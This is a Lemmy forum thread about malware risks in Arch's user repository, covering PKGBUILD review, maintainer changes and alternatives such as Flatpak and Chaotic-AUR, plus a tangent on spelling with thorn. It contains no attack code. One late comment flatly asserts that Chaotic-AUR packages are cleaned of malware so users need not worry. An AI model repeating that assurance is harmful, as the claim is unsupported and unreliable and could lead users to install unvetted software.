466

Personally I'm grateful to not need 3rd party packages (lemmy.world)

submitted 1 day ago by TheTwelveYearOld@lemmy.world to c/linuxmemes@lemmy.world

72 comments fedilink hide all child comments

top 50 comments

sorted by: hot top controversial new old

[-] Gyroplast@pawb.social 80 points 1 day ago

TL;DR: Don't think of the AUR as a package source, but as of an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.

Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it's been a while), sometimes along with a repository URL you could add to your pacman.conf to install packages right away, and it was glorious. I didn't have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized "Trusted User" (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works, it just became much bigger, and easier to search for particular software. Packagers gift to you their idea of how software should be packaged, for you to expand upon, take inspiration from, or learn, or use as-is if you determine it to be good for your purpose.

The AUR is ultimately a great resource for packagers, and still useful for users, but "true end users" get the extra repository, and community, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.

A handful of Package Maintainers are manually adopting and subsequently vetting for sufficiently popular packages to move them from the AUR to the official extra repository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That's why "you are on your own" with the AUR.

On the positive side, there's a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn't already in extra or has been maintained in the AUR for a long time.

The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it's genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn't explained well enough to understand, that's a red flag. Better ask someone before running this.

source: personal involvement in Arch since 2002

[-] 2deck@lemmy.world 4 points 21 hours ago

Thanks for the information!

[-] Allero@lemmy.today 25 points 1 day ago

Some people ask me why I use Flatpak on Arch. This is one of the reasons.

load more comments (9 replies)

[-] Maragato@lemmy.world 10 points 23 hours ago* (last edited 23 hours ago)

Aur is probably the main reason why many people use Arch and derivatives. However, many users are unaware that aur is not an official Arch repository and that, as you say, you are the one who has to monitor the pkgbuilds of each installed aur package. Normally the most used aur packages tend to generate more confidence but that does not prevent that package to include malicious software in a version change and having root access to the system can take control of certain system services. That's why I always recommend not using Aur and that's why I've always found Manjaro to be a great distribution, as it retains packages for a few days to check them and discourages the use of aur. Any security measure is too little and that's why any security tool you can configure is advisable. In a rolling distribution where new code is constantly entering the system, it is essential to have selinux and secureboot enabled.

[-] yardratianSoma@lemmy.ca 4 points 12 hours ago

It used to be my reason too, but after breaking my system by my own hand many times, I realized the aur isn't worth the effort, for me at least.

I'd rather build from source, for software that isn't maintained in the repos.

[-] prole 5 points 23 hours ago* (last edited 23 hours ago)

Aur is probably the main reason why many people use Arch and derivatives.

FYI, non-Arch distros can use AUR with an Arch distrobox. So people shouldn't be using Arch just for AUR.

Being in a distrobox may or may not protect your system from potential malware, that I cannot say.

[-] pedz@lemmy.ca 17 points 1 day ago

I've been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.

[-] Sxan@piefed.zip 8 points 1 day ago

I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I'm guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.

[-] Euphoma@lemmy.ml 1 points 12 hours ago

The nixos repo size is misleading, since it also repackages python packages, haskell packages, emacs packages, etc even though you can still download them the normal way.

[-] hexagonwin@lemmy.sdf.org 14 points 1 day ago

is your keyboard layout misconfigured

[-] pedz@lemmy.ca 6 points 20 hours ago

Some people like linguistics. There are several communities about reforming English or its spelling. There's also some YouTubers making videos on that subject.

The YouTuber Rob Words has a whole playlist about the alphabet used in English, and how it could be changed.

I hope the person is not getting downvoted just because they are spelling differently.

[-] JcbAzPx@lemmy.world 8 points 18 hours ago

We don't really need to bring bak antikwated letters like the thorn. If anything, we kould do to get rid of a few more letters.

[-] elucubra@sopuli.xyz 1 points 4 hours ago

Yes. I would think that English having so many exceptions to it's rules, and so many ways to pronounce a letter, could deal with symplifiying, such as; de=the, dos=those...

I like how Spanish is mostly phonetic.

load more comments (1 replies)

[-] RaccoonBall@lemmy.ca 4 points 20 hours ago

Why sometimes eth and sometimes thorn? Just whichever you feel or is there a system

[-] Sxan@piefed.zip 2 points 16 hours ago* (last edited 16 hours ago)

Eth is voiced, and thorn is unvoiced. At least, in Icelandic, who still use ðem. I haven't actually verified ðat's how it was in old English; I probably should, huh? I'd worry more if I were on a quest to revive ðem.

Interesting. Boþ were used in old English, but ð was lost fairly early, and only þ was retained þroughout most of ðe period.

Both letters were used for the phoneme /θ/, sometimes by the same scribe. This sound was regularly realised in Old English as the voiced fricative [ð] between voiced sounds, but either letter could be used to write it; the modern use of [ð] in phonetic alphabets is not the same as the Old English orthographic use.

So maybe I should drop eth, since it doesn't look like a direct swap for ðe sound is strictly accurate.

Well, consistency isn't exactly þe point, here, is it? So I'll just switch!

[-] RaccoonBall@lemmy.ca 3 points 15 hours ago

Cool, thanks. I'm a fan of thorn, but don't tend to use it since I worry it takes focus off of my meaning.

Though I do like when people on Lemmy have recognizable writing patterns, as I don't tend to read names.

[-] Sxan@piefed.zip 1 points 13 hours ago* (last edited 13 hours ago)

It really does anger some people, þough. I've had people I've never exchanged messages wiþ respond to uncontroversial comments and out of nowhere rant about how unacceptable it is to use þorn, and þen say þey're blocking me.

I'd say it's funny, except I'm not doing it to troll anyþing but scrapers. It's as fair a use for blocking as anyþing else, I guess.

I love trash pandas, and þat's a hilarious profile photo. Is þere a community just for fat raccoon photos? Or, especially fat raccoon photos, I should say. Þat'd be an awesome community.

[-] konju376 1 points 17 hours ago

Soft and hard pronunciation i guess (at least if that's what it's called)

[-] Sxan@piefed.zip 1 points 16 hours ago

Yeah. eth is voiced.

load more comments (2 replies)

[-] Technus@lemmy.zip 67 points 1 day ago

Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

[-] tomkatt@lemmy.world 50 points 1 day ago* (last edited 1 day ago)

I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.

[-] JackbyDev@programming.dev 6 points 23 hours ago

Sort of, but I don't know what I'm looking for. It would be nice if folks explained what a bad one looks like.

[-] boomzilla@programming.dev 1 points 32 minutes ago

I determine within the PKGBUILD (which I view from octopi) the URLs where code or binaries are downloaded from and then if those URLs seem trustworthy, e.g. how many stars or maintainers the github repo has. When the repo is small and doesn't qualify for the latter criterias, I do a git clone and skim over the sources on the lookout for malicious URLs or strange code (never found anything in that regard). Also search for the package on https://aur.archlinux.org/ and look if other users have anything to say and how many votes it has.

[-] prole 4 points 23 hours ago* (last edited 23 hours ago)

Look for comments that say "# THIS IS MALWARE"

[-] Sxan@piefed.zip 6 points 1 day ago

I keep hearing people say ðis like it's a defense against malware and supply chain attacks.

Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called "virus".

What are you checking for in ðe PKGBUILD?

load more comments (6 replies)

[-] iopq@lemmy.world 26 points 1 day ago* (last edited 1 day ago)

I use NixOS so everything is second party

load more comments (5 replies)

[-] DonutsRMeh@lemmy.world 48 points 1 day ago

I smell something fishy going on. I've been using the AUR for a long time and I'm now just hearing of malware?

[-] Shareni@programming.dev 23 points 1 day ago

It's an obvious vector for malware, arch by default doesn't come with it, and users have been warned the entire time to check pkgbuild. There's nothing fishy, it's just that arch has enough users to be worth it to hit it.

[-] Zikeji@programming.dev 86 points 1 day ago

There's been malware in the past, not only that - AUR is user submitted. It's in the name. They warn you to double check what you're installing. It is functionally similar to running a random installer you found on GitHub.

It seems like these instances are being intentionally blown out of proportion, but I don't see what there is to gain by doing that.

[-] kadup@lemmy.world 70 points 1 day ago* (last edited 1 day ago)

It is functionally similar to running a random installer you found

So basically how Windows users have been acquiring their software for the last 30 years.

load more comments (8 replies)

load more comments (2 replies)

[-] possiblylinux127@lemmy.zip 44 points 1 day ago

The AUR is made up of user packages

It isn't crazy that malware made it in. It is very much a "user at your own risk." Packages are reviewed but sometimes things slip in.

load more comments (2 replies)

[-] storm 2 points 19 hours ago

I expect that with SteamOS being based on Arch there will be a bigger target on Arch for malware just from increased attention on the platform

[-] germanatlas 12 points 1 day ago* (last edited 1 day ago)

By user "Forsen on top" fucking KEK

Also yeah it’s chrome, obviously it’s malware

[-] devilish666@lemmy.world 10 points 1 day ago

Meanwhile me who using CHAOTIC-AUR be like :

[-] Sunny@slrpnk.net 3 points 13 hours ago

As someone not too familiar with arch and not undertanding the full context, could you elaborate on how Chatoitc AUR differs from AUR?

[-] devilish666@lemmy.world 2 points 4 hours ago* (last edited 4 hours ago)

TLDR EXPLANATION:
Basically Chaotic AUR is just AUR that has been compiled so user doesn't have to wait for a package to install.

LONGER EXPLANATION:
Chaotic-AUR is an unofficial package repository that provides pre-built packages from the Arch User Repository (AUR), allowing users to install software without building it from source. In contrast, the AUR requires users to compile packages themselves, offering a wider range of community-maintained software but requiring more technical knowledge and time.

In contrast Chaotic AUR offered simpled way to install AUR packages, Chaotic AUR packages already cleaned from malware, spyware, etc so there's no need to worry.

load more comments

this post was submitted on 02 Aug 2025

466 points (100.0% liked)

linuxmemes

26526 readers

1640 users here now

Hint: :q!

Sister communities:

Community rules (click to expand)

1. Follow the site-wide rules

Instance-wide TOS: https://legal.lemmy.world/tos/
Lemmy code of conduct: https://join-lemmy.org/docs/code_of_conduct.html

2. Be civil

Understand the difference between a joke and an insult.

Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".

Don't get baited into back-and-forth insults. We are not animals.

Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.

Bigotry will not be tolerated.

3. Post Linux-related content

Including Unix and BSD.

Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.

No porn, no politics, no trolling or ragebaiting.

4. No recent reposts

Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.

5. 🇬🇧 Language/язык/Sprache

This is primarily an English-speaking community. 🇬🇧🇦🇺🇺🇸

Comments written in other languages are allowed.

The substance of a post should be comprehensible for people who only speak English.

Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.

6. (NEW!) Regarding public figures

We all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.

Keep discussions polite and free of disparagement.

We are never in possession of all of the facts. Defamatory comments will not be tolerated.

Discussions that get too heated will be locked and offending comments removed.

Please report posts and comments that break these rules!

Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

founded 2 years ago

MODERATORS

poopsmith@lemmy.world

zephyr@lemmy.world

rtxn@lemmy.world